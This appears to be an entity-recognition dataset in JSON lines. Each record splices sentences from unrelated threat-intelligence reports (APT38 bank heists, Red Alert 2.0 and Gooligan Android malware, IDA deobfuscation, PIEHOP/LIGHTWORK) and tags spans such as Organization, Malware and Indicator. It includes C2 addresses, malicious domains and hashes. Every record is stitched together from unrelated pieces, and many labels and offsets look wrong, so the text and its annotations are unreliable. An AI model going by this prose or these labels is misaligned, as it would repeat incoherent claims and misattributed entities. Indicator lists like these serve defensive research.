{"text": "During the app execution , the malware contacts C2 domain for further instructions . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware . this can be seen as calculating a value that will always return True . We also reveal what ransomware gangs are now experimenting with to break into your company \u2014 including their offers to \u201c recruit \u201d employees as insider threats .", "spans": [{"start": 85, "end": 90, "label": "Organization"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 147, "end": 172, "label": "Organization"}, {"start": 243, "end": 265, "label": "Organization"}, {"start": 403, "end": 419, "label": "Organization"}]}
{"text": "Most of the network traffic we \u2019 ve observed is HTTP . Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" . Control flow flattening is an obfuscation method where programs do not cleanly flow from beginning to end . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 48, "end": 52, "label": "Indicator"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 175, "end": 178, "label": "Organization"}, {"start": 317, "end": 326, "label": "System"}, {"start": 327, "end": 436, "label": "Malware"}]}
{"text": "The C2 address , as stored in samples we \u2019 ve seen , comprise both an IP address and port number ; So far , all the samples we \u2019 ve tested attempted to contact an IP address on port 7878/tcp . Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship . Instead , If you followed Cybersecurity and Infrastructure Security Agency CISA alerts on ransomware for the year , you would have noted malicious activity attributed to many ransomware variants .", "spans": [{"start": 177, "end": 190, "label": "Indicator"}, {"start": 368, "end": 386, "label": "Organization"}, {"start": 518, "end": 571, "label": "Organization"}, {"start": 667, "end": 686, "label": "Malware"}]}
{"text": "If the main C2 domain is not responsive , the bot fetches a backup C2 domain from a Twitter account . Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime . a switch statement is called in an infinite loop having multiple code blocks each performing operations . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": [{"start": 84, "end": 91, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 183, "end": 205, "label": "Organization"}]}
{"text": "Static analysis of the code reveals that the malware downloads the overlay template to use against any of the bank ( s ) it is targeting . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions . The obfuscations looked similar to the ones explained in Hex-Rays blog , These disruptive cyber operations began in January 2022 , prior to Russia \u2019s illegal further invasion of Ukraine and have continued throughout the war .", "spans": [{"start": 152, "end": 157, "label": "Organization"}, {"start": 218, "end": 240, "label": "Organization"}, {"start": 421, "end": 428, "label": "Organization"}]}
{"text": "The malware also sends regular telemetry back to its C2 server about the infected device in the form of an HTTP POST to its C2 server . APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 . but the introduced IDA Pro plugin HexRaysDeob didn\u2019t work for one of the obfuscated ANEL samples because the tool was made for another variant of the obfuscation . Mandiant observed log entries in jcagent.log that indicated a directive named \u201c Runworkflow \u201d triggered execution on the system :", "spans": [{"start": 107, "end": 111, "label": "Indicator"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 198, "end": 216, "label": "Organization"}, {"start": 258, "end": 265, "label": "System"}, {"start": 273, "end": 284, "label": "System"}, {"start": 323, "end": 327, "label": "Malware"}, {"start": 421, "end": 447, "label": "Indicator"}, {"start": 463, "end": 530, "label": "Indicator"}]}
{"text": "It uses the base Dalvik User-Agent string for the device it \u2019 s running on . We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission . TAU investigated the ANEL obfuscation algorithms then modified the HexRaysDeob code to defeat the obfuscations . Further analyses of these similarities are available via Mandiant Advantage .", "spans": [{"start": 110, "end": 115, "label": "Organization"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 130, "end": 149, "label": "Organization"}, {"start": 177, "end": 182, "label": "Organization"}, {"start": 204, "end": 207, "label": "Organization"}, {"start": 225, "end": 229, "label": "Malware"}, {"start": 271, "end": 282, "label": "System"}, {"start": 374, "end": 392, "label": "Organization"}]}
{"text": "The content of the HTTP POST data is telemetry data in a json format about the device the malware is running on . The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions . After the modification , Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 19, "end": 23, "label": "Indicator"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 133, "end": 145, "label": "Organization"}, {"start": 175, "end": 191, "label": "Organization"}, {"start": 273, "end": 295, "label": "Organization"}, {"start": 446, "end": 451, "label": "Organization"}, {"start": 517, "end": 527, "label": "System"}]}
{"text": "The list of banks targeted by Red Alert 2.0 includes NatWest , Barclays , Westpac , and Citibank . APT38 also targeted financial transaction exchange companies likely because of their proximity to banks . TAU was able to recover the original code . Adversaries may perform data destruction over the course of an operation .", "spans": [{"start": 30, "end": 43, "label": "Malware"}, {"start": 63, "end": 71, "label": "Organization"}, {"start": 99, "end": 104, "label": "Organization"}, {"start": 119, "end": 159, "label": "Organization"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 205, "end": 208, "label": "Organization"}]}
{"text": "Red Alert 2.0 is a banking bot that is currently very active online , and presents a risk to Android devices . Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) . HexRaysDeob is an IDA Pro plugin written by Rolf Rolles to address obfuscation seen in binaries . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker \u2019s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 244, "end": 250, "label": "Organization"}, {"start": 363, "end": 374, "label": "Organization"}, {"start": 388, "end": 393, "label": "Organization"}, {"start": 425, "end": 430, "label": "Organization"}, {"start": 435, "end": 446, "label": "System"}, {"start": 453, "end": 460, "label": "System"}, {"start": 552, "end": 569, "label": "Organization"}, {"start": 581, "end": 592, "label": "Organization"}, {"start": 593, "end": 679, "label": "Vulnerability"}]}
{"text": "We expect to see more diversification in the social engineering lures this threat group employs as time goes on . APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time . In order to perform the deobfuscation , Facebook has spotted that same malware being used in this most recent campaign , but this operation has a far broader set of infection techniques and targets outside of the Middle East .", "spans": [{"start": 114, "end": 119, "label": "Organization"}, {"start": 199, "end": 221, "label": "Organization"}, {"start": 257, "end": 262, "label": "System"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 381, "end": 388, "label": "Malware"}, {"start": 420, "end": 428, "label": "Organization"}, {"start": 500, "end": 534, "label": "Organization"}]}
{"text": "So far , legitimate app stores appear to be this malware \u2019 s Achilles heel ; disabling the installation of third-party apps has been an effective prevention measure . We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations . the plugin manipulates the IDA intermediate language called microcode . PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands \" ON \" or \" OFF \" to the remote system and then immediately deletes the executable after issuing the command .", "spans": [{"start": 485, "end": 491, "label": "System"}, {"start": 501, "end": 510, "label": "System"}]}
{"text": "Stick to Google Play and use VPN software from reputable vendors . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime . If you aren\u2019t familiar with those structures ( e.g , The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": [{"start": 9, "end": 20, "label": "System"}, {"start": 129, "end": 134, "label": "Organization"}, {"start": 170, "end": 192, "label": "Organization"}, {"start": 333, "end": 435, "label": "Indicator"}]}
{"text": "Sophos detects all the samples of this Trojan family as Andr/Banker-GWC and Andr/Spybot-A . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime . microcode data structures , I Enabled PowerShell Logging and Transcript logging that get the full PowerShell session with the output .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 195, "end": 217, "label": "Organization"}]}
{"text": "In the wild , these are only distributed as a direct download from unofficial Web pages ( \u201c third-party \u201d app ) and not through legitimate app stores . Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector . maturity level , There are more unused URLs in the script .", "spans": [{"start": 165, "end": 170, "label": "Organization"}, {"start": 203, "end": 227, "label": "Organization"}, {"start": 238, "end": 261, "label": "Organization"}, {"start": 319, "end": 338, "label": "Organization"}, {"start": 359, "end": 375, "label": "Organization"}, {"start": 395, "end": 435, "label": "Indicator"}]}
{"text": "Red Alert 2.0 IoCs list C2 addresses 103.239.30.126:7878 146.185.241.29:7878 146.185.241.42:7878 185.126.200.3:7878 185.126.200.12:7878 185.126.200.15:7878 185.126.200.18:7878 185.165.28.15:7878 185.243.243.241:7878 185.243.243.244:7878 185.243.243.245:7878 Domains Malware source Web hosts Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States . Microcode Explorer and so on ) The most recent attack on communications company Viasat in Ukraine had a wider impact across the continent , disrupting wind farms and internet users in central Europe .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 37, "end": 56, "label": "Indicator"}, {"start": 57, "end": 76, "label": "Indicator"}, {"start": 77, "end": 96, "label": "Indicator"}, {"start": 97, "end": 115, "label": "Indicator"}, {"start": 116, "end": 135, "label": "Indicator"}, {"start": 136, "end": 155, "label": "Indicator"}, {"start": 156, "end": 175, "label": "Indicator"}, {"start": 176, "end": 194, "label": "Indicator"}, {"start": 195, "end": 215, "label": "Indicator"}, {"start": 216, "end": 236, "label": "Indicator"}, {"start": 237, "end": 257, "label": "Indicator"}, {"start": 330, "end": 335, "label": "Organization"}, {"start": 450, "end": 472, "label": "Organization"}, {"start": 483, "end": 494, "label": "Organization"}, {"start": 576, "end": 594, "label": "System"}, {"start": 633, "end": 655, "label": "Organization"}, {"start": 656, "end": 662, "label": "Organization"}]}
{"text": "on 167.99.176.61 : free-androidvpn.date free-androidvpn.download free-androidvpn.online free-vpn.date free-vpn.download free-vpn.online Hashes 22fcfce096392f085218c3a78dd0fa4be9e67ed725bce42b965a27725f671cf 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372 TEMP.Hermit is generally linked to operations focused on South Korea and the United States . , n.bat n.bat Unknown Likely runs native scilc.exe utility s1.txt", "spans": [{"start": 3, "end": 16, "label": "Indicator"}, {"start": 19, "end": 39, "label": "Indicator"}, {"start": 88, "end": 101, "label": "Indicator"}, {"start": 207, "end": 271, "label": "Indicator"}, {"start": 272, "end": 283, "label": "Organization"}, {"start": 387, "end": 430, "label": "Indicator"}]}
{"text": "be92a751e5abbcd24151b509dbb4feb98ea46f367a99d6f86ed4a7c162461e31 5c4d666cef84abc2a1ffd3b1060ef28fa3c6c3bb4fad1fa26db99350b41bea4c 06081ab7faa729e33b9397a0e47548e75cbec3d43c50e6368e81d737552150a5 753999cb19a4346042f973e30cf1158c44f2335ab65859d3bfa16bca4098e2ef While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 . you should read his blog post . Continual education for employees to spot phishing attacks is also a key , basic measure with todays threat landscape .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 465, "end": 484, "label": "Organization"}, {"start": 546, "end": 551, "label": "Organization"}]}
{"text": "As a result of a lot of hard work done by our security research teams , we revealed today a new and alarming malware campaign . APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems . Rolles also provides an overview of each obfuscation technique in the same post . Hildegard has used an IRC channel for C2 communications.[6 ]", "spans": [{"start": 128, "end": 133, "label": "Organization"}, {"start": 430, "end": 439, "label": "Organization"}, {"start": 452, "end": 463, "label": "System"}, {"start": 468, "end": 488, "label": "System"}]}
{"text": "The attack campaign , named Gooligan , breached the security of over one million Google accounts . APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud . HexRaysDeob installs two callbacks when loading : It trick users into connecting their wallet with the goal of initiating transactions to drain their account .", "spans": [{"start": 28, "end": 36, "label": "Malware"}, {"start": 81, "end": 87, "label": "Organization"}, {"start": 99, "end": 104, "label": "Organization"}, {"start": 107, "end": 113, "label": "Organization"}, {"start": 139, "end": 160, "label": "Organization"}, {"start": 189, "end": 206, "label": "Organization"}, {"start": 256, "end": 267, "label": "System"}]}
{"text": "The number continues to rise at an additional 13,000 breached devices each day . APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud . optinsn_t for defeating opaque predicates ( defined as ObfCompilerOptimizer ) Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 81, "end": 86, "label": "Organization"}, {"start": 110, "end": 131, "label": "Organization"}, {"start": 160, "end": 177, "label": "Organization"}, {"start": 227, "end": 236, "label": "System"}, {"start": 282, "end": 302, "label": "System"}, {"start": 428, "end": 433, "label": "Organization"}, {"start": 499, "end": 509, "label": "Organization"}]}
{"text": "Our research exposes how the malware roots infected devices and steals authentication tokens that can be used to access data from Google Play , Gmail , Google Photos , Google Docs , G Suite , Google Drive , and more . Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 . optblock_t for defeating control flow flattening ( defined as CFUnflattener ) In any case , the VBA code still runs whenever the files are executed .", "spans": [{"start": 130, "end": 141, "label": "System"}, {"start": 144, "end": 149, "label": "System"}, {"start": 152, "end": 165, "label": "System"}, {"start": 168, "end": 179, "label": "System"}, {"start": 182, "end": 189, "label": "System"}, {"start": 192, "end": 204, "label": "System"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 280, "end": 302, "label": "Organization"}, {"start": 464, "end": 474, "label": "System"}, {"start": 560, "end": 568, "label": "Malware"}]}
{"text": "Gooligan is a new variant of the Android malware campaign found by our researchers in the SnapPea app last year . We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time . . It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 165, "end": 187, "label": "Organization"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 404, "end": 420, "label": "Indicator"}, {"start": 425, "end": 433, "label": "Indicator"}, {"start": 465, "end": 472, "label": "Organization"}]}
{"text": "Check Point reached out to the Google Security team immediately with information on this campaign . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank . Before continuing , Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 31, "end": 46, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 135, "end": 142, "label": "System"}, {"start": 162, "end": 169, "label": "System"}, {"start": 174, "end": 183, "label": "System"}, {"start": 273, "end": 277, "label": "Organization"}, {"start": 318, "end": 334, "label": "System"}, {"start": 374, "end": 390, "label": "System"}, {"start": 418, "end": 429, "label": "System"}, {"start": 480, "end": 493, "label": "Organization"}]}
{"text": "Our researchers are working closely with Google to investigate the source of the Gooligan campaign . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank . it is important to understand Hex-Rays maturity levels . None The bottom line is that BadBlood is not one of its kind however , for Charming Kitten , it implies a shift in target and collection priorities as they usually target dissidents , academics , diplomats , and journalists in order to further Iranian IRGC interests .", "spans": [{"start": 41, "end": 47, "label": "Organization"}, {"start": 81, "end": 98, "label": "Malware"}, {"start": 121, "end": 126, "label": "Organization"}, {"start": 136, "end": 143, "label": "System"}, {"start": 163, "end": 170, "label": "System"}, {"start": 175, "end": 184, "label": "System"}, {"start": 274, "end": 278, "label": "Organization"}, {"start": 311, "end": 319, "label": "System"}, {"start": 367, "end": 375, "label": "Organization"}, {"start": 413, "end": 428, "label": "Organization"}, {"start": 509, "end": 561, "label": "Organization"}]}
{"text": "\u201c We \u2019 re appreciative of both Check Point \u2019 s research and their partnership as we \u2019 ve worked together to understand these issues , \u201d said Adrian Ludwig , Google \u2019 s director of Android security . From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks . When a binary is loaded into IDA Pro , You 'll uncover why the US has seen a significant uptick in ransomware incidents across the board , especially in sectors like education .", "spans": [{"start": 31, "end": 42, "label": "Organization"}, {"start": 157, "end": 163, "label": "Organization"}, {"start": 180, "end": 187, "label": "System"}, {"start": 244, "end": 249, "label": "Organization"}, {"start": 309, "end": 314, "label": "Organization"}, {"start": 346, "end": 353, "label": "System"}, {"start": 416, "end": 426, "label": "Malware"}, {"start": 483, "end": 492, "label": "Organization"}]}
{"text": "\u201c As part of our ongoing efforts to protect users from the Ghost Push family of malware , we \u2019 ve taken numerous steps to protect our users and improve the security of the Android ecosystem overall. \u201d We are very encouraged by the statement Google shared with us addressing the issue . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 . the application will perform distinct layers of code analysis and optimization , Mandiant attributed these intrusions to UNC4899 , a Democratic People 's Republic of Korea ( DPRK)-nexus actor , with a history of targeting companies within the cryptocurrency vertical .", "spans": [{"start": 59, "end": 76, "label": "Malware"}, {"start": 172, "end": 179, "label": "System"}, {"start": 241, "end": 247, "label": "Organization"}, {"start": 387, "end": 396, "label": "Organization"}, {"start": 425, "end": 430, "label": "Organization"}, {"start": 554, "end": 561, "label": "Organization"}, {"start": 566, "end": 624, "label": "Organization"}]}
{"text": "We have chosen to join forces to continue the investigation around Gooligan . Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations . referred to as maturity levels . The threat actor then used the built - in certutil utility to Base64 encode the segments .", "spans": [{"start": 67, "end": 75, "label": "Malware"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 387, "end": 414, "label": "System"}]}
{"text": "Google also stated that they are taking numerous steps including proactively notifying affected accounts , revoking affected tokens and deploying SafetyNet improvements to protect users from these apps in the future . This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 . One layer will detect shellcode , Ashley Madison \u2019s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 264, "end": 275, "label": "Organization"}, {"start": 286, "end": 295, "label": "System"}, {"start": 322, "end": 327, "label": "Organization"}, {"start": 352, "end": 356, "label": "Organization"}, {"start": 423, "end": 440, "label": "Organization"}, {"start": 537, "end": 603, "label": "System"}]}
{"text": "Who is affected ? APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank . another optimizes it into blocks , The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": [{"start": 18, "end": 23, "label": "Organization"}, {"start": 34, "end": 41, "label": "System"}, {"start": 200, "end": 204, "label": "Organization"}, {"start": 242, "end": 255, "label": "Organization"}, {"start": 324, "end": 339, "label": "Organization"}]}
{"text": "Gooligan potentially affects devices on Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop ) , which is over 74 % of in-market devices today . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions . another determines global variables , Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 40, "end": 92, "label": "System"}, {"start": 147, "end": 152, "label": "Organization"}, {"start": 158, "end": 165, "label": "System"}, {"start": 263, "end": 277, "label": "Organization"}, {"start": 393, "end": 398, "label": "Organization"}, {"start": 422, "end": 440, "label": "Indicator"}, {"start": 445, "end": 455, "label": "Indicator"}, {"start": 472, "end": 493, "label": "Indicator"}]}
{"text": "About 57 % of these devices are located in Asia and about 9 % are in Europe . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities . and so forth . Further analysis of COSMICENERGY is available as part of .", "spans": [{"start": 98, "end": 103, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 277, "end": 289, "label": "Malware"}]}
{"text": "In our research we identified tens of fake applications that were infected with this malware . During one reported incident , APT38 caused an outage in the bank 's essential services . The optinsn_t : :f unc callback function is called in maturity levels from MMAT_ZERO ( microcode does not exist ) Viasat has said that \u201c tens of thousands of terminals have been damaged , made inoperable and can not be repaired . \u201d", "spans": [{"start": 126, "end": 131, "label": "Organization"}, {"start": 156, "end": 160, "label": "Organization"}, {"start": 189, "end": 207, "label": "System"}, {"start": 260, "end": 269, "label": "System"}, {"start": 299, "end": 305, "label": "Organization"}]}
{"text": "If you \u2019 ve downloaded one of the apps listed in Appendix A , below , you might be infected . We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy . to MMAT_GLBOPT2 ( most global optimizations completed ) However , twice this year , in March and June , LockBit 's considerable rate of attacks was vastly exceeded by CL0P , which was otherwise dormant .", "spans": [{"start": 107, "end": 112, "label": "Organization"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 342, "end": 354, "label": "System"}, {"start": 443, "end": 450, "label": "Organization"}, {"start": 506, "end": 510, "label": "Organization"}]}
{"text": "You may review your application list in \u201c Settings - > Apps \u201d , if you find one of this applications , please consider downloading an antivirus product such as Check Point ZoneAlarm to check if you are indeed infected . As detailed in the DOJ complaint , a sample of WHITEOUT malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . . A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": [{"start": 160, "end": 171, "label": "Organization"}, {"start": 172, "end": 181, "label": "System"}, {"start": 267, "end": 283, "label": "System"}, {"start": 300, "end": 305, "label": "Organization"}, {"start": 363, "end": 367, "label": "Organization"}, {"start": 374, "end": 399, "label": "System"}, {"start": 471, "end": 492, "label": "System"}]}
{"text": "We have noticed that hundreds of the email addresses are associated with enterprise accounts worldwide . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . During the callback , It incorporates the capabilities of the FULLHOUSE tunneler in addition to supporting backdoor commands including shell command execution , file transfer , file management , and process injection .", "spans": [{"start": 105, "end": 110, "label": "Organization"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 172, "end": 194, "label": "Organization"}, {"start": 279, "end": 415, "label": "Malware"}]}
{"text": "How do you know if your Google account is breached ? APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . opaque predicates pattern matching functions are called . Mandiant first observed the self - proclaimed hacktivist group calling itself \" Anonymous Sudan \" in January 2023 and the group soon after declared allegiance to KillNet .", "spans": [{"start": 24, "end": 30, "label": "Organization"}, {"start": 53, "end": 58, "label": "Organization"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 120, "end": 142, "label": "Organization"}, {"start": 263, "end": 271, "label": "Organization"}, {"start": 343, "end": 358, "label": "Organization"}]}
{"text": "You can check if your account is compromised by accessing the following web site that we created : https : //gooligan.checkpoint.com/ . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . If the code pattern is matched with the definitions , Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": [{"start": 99, "end": 133, "label": "Indicator"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 203, "end": 225, "label": "Organization"}]}
{"text": "If your account has been breached , the following steps are required : A clean installation of an operating system on your mobile device is required ( a process called \u201c flashing \u201d ) . Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity . it is replaced with another expression for the deobfuscation . What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": [{"start": 210, "end": 215, "label": "Organization"}, {"start": 220, "end": 231, "label": "Organization"}, {"start": 298, "end": 316, "label": "Organization"}, {"start": 474, "end": 492, "label": "Organization"}]}
{"text": "As this is a complex process , we recommend powering off your device and approaching a certified technician , or your mobile service provider , to request that your device be \u201c re-flashed. \u201d Change your Google account passwords immediately after this process . APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry . This is important to perform in each maturity level as the obfuscated code could be modified or removed as the code becomes more optimized . Both TANKTRAP GPOs deployed CADDYWIPER from a staged directory to systems as msserver.exe .", "spans": [{"start": 203, "end": 209, "label": "Organization"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 287, "end": 312, "label": "Organization"}, {"start": 348, "end": 363, "label": "Organization"}, {"start": 368, "end": 376, "label": "Organization"}, {"start": 401, "end": 419, "label": "Organization"}, {"start": 568, "end": 581, "label": "Organization"}, {"start": 591, "end": 601, "label": "Malware"}, {"start": 640, "end": 652, "label": "Indicator"}]}
{"text": "How do Android devices become infected ? This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization . We defined two patterns for analysis of the ANEL sample . the second with invalid handle 0 , will return 0 or should be 0 in normal systems , this could be antisandboxemulation not sure as the functions return value is not used .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 272, "end": 276, "label": "Malware"}, {"start": 286, "end": 318, "label": "Malware"}, {"start": 321, "end": 367, "label": "Malware"}]}
{"text": "We found traces of the Gooligan malware code in dozens of legitimate-looking apps on third-party Android app stores . Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state . The global variable value dword_745BB58C is either even or odd , The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": [{"start": 23, "end": 31, "label": "Malware"}, {"start": 97, "end": 104, "label": "System"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 184, "end": 190, "label": "Organization"}, {"start": 383, "end": 394, "label": "Malware"}, {"start": 399, "end": 413, "label": "Malware"}, {"start": 432, "end": 439, "label": "Malware"}]}
{"text": "These stores are an attractive alternative to Google Play because many of their apps are free , or offer free versions of paid apps . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea . so dword_745BB58C * ( dword_745BB58C \u2013 1 ) The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": [{"start": 46, "end": 57, "label": "System"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 259, "end": 274, "label": "Organization"}, {"start": 285, "end": 296, "label": "Organization"}, {"start": 317, "end": 324, "label": "Organization"}, {"start": 492, "end": 505, "label": "System"}, {"start": 533, "end": 556, "label": "Organization"}, {"start": 574, "end": 578, "label": "Indicator"}, {"start": 599, "end": 622, "label": "Organization"}]}
{"text": "However , the security of these stores and the apps they sell aren \u2019 t always verified . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . is always even . The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": [{"start": 136, "end": 144, "label": "System"}, {"start": 151, "end": 159, "label": "System"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 249, "end": 253, "label": "Organization"}]}
